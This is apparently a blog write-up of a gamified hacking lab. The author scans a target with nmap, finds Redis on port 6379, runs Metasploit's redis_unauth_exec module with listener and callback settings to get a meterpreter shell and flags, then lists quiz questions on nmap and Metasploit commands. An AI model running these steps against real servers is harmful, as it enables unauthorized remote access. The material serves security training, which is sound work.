I just stumbled accross this funny little browser game. It’s a nice idea of gamification where you can learn some IT-Security skills.
I thought I’ll give it a try, so let’s play 😉
Start the lab to get a terminal on an attacker machine that has tools like Nmap, Metasploit, etc. installed. Your task is to get root on a target database server on the same network and in the process successfully complete the tasks on the left to win the cup!
Finding the IP of the target server:
Run „ip addr“ on the shell to find all your interface IP addresses. One of the IPs will be in the range 192.X.Y.2. Your target server has the IP 192.X.Y.3
First let’s check in the terminal what ip address we have:
126.96.36.199 is our ip address. Our target must be 188.8.131.52
For the first flag we need to know on which port the redis server is running. Let’s perform a nmap scan.
nmap -sS -sV -p- 184.108.40.206
The redis server is running on port 6379 which is the first flag.
Let’s go over to the next puzzle…
For that we have to start the metasploit console…
and do a query for „redit“ to check the available exploits…
The second flag must be: exploit/linux/redis/redis_unauth_exec
So let’s check if we can run this exploit against our target server that we can solve the next flag 🙂
During documentation, the lab crashed once. After restarting I got a new ip address. Therfore attacker and target ip changed…
set rhosts 220.127.116.11
set lhost 18.104.22.168
set srvhost 22.214.171.124
We have a meterpreter shell 🙂
Let’s see what we find. There is a file called flag, but no run sh shell script…
leaving the root directory and see what we have…
Ther’s the run.sh script
That’s the name of the service and our next flag
- basic commands of nmap
- basic commands of metasploit with exploiting a target
basic nmap commands:
First, how do you access the help menu?
Often referred to as a stealth scan, what is the first switch listed for a ‚Syn Scan‘?
Not quite as useful but how about a ‚UDP Scan‘?
What about operating system detection?
How about service version detection?
Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag?
What about ‚very verbose‘? (A personal favorite)
Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format?
Aggressive scans can be nice when other scans just aren’t getting the output that you want and you really don’t care how ‚loud‘ you are, what is the switch for enabling this?
How do I set the timing to the max level, sometimes called ‚Insane‘?
What about if I want to scan a specific port?
How about if I want to scan every port?
What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without the specification of what script to run.
What if I want to run all scripts out of the vulnerability category?
What switch should I include if I don’t want to ping the host?
basic metasploit commands:
how do you start the metasploit console?
what command do you use to search for a specific exploit?
search „service or exploit name“
how do you use a specific exploit?
how do you check if a target is vulnerable after a exploit is loaded?
check „target ip address“
how do you get the option switches of a specific exploit?
how do you show and use payloads of a specific exploit?
set payload linux/…
how do you configure the exploit options?
how do you run a specific exploit?